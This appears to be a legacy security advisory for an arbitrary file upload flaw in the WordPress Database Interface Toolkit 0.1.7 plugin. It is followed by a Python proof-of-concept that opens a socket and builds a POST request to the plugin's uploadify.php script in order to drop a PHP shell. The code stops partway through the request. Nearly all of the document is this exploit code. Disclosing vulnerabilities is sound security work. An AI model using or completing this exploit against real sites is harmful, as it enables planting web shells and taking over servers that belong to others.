Legacy Advisories

Description

An arbitrary upload vulnerability in WordPress Database Interface Toolkit 0.1.7 can be exploited to upload a PHP shell.

Proof Of Concept

import socket

path = '/wordpress'
shell_path = path + '/shell.php'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/wp-content/plugins/db-toolkit/data_form/fieldtypes/file/scripts/uploadify.php?folder=/' + path + ' HTTP/1.1\r\n'
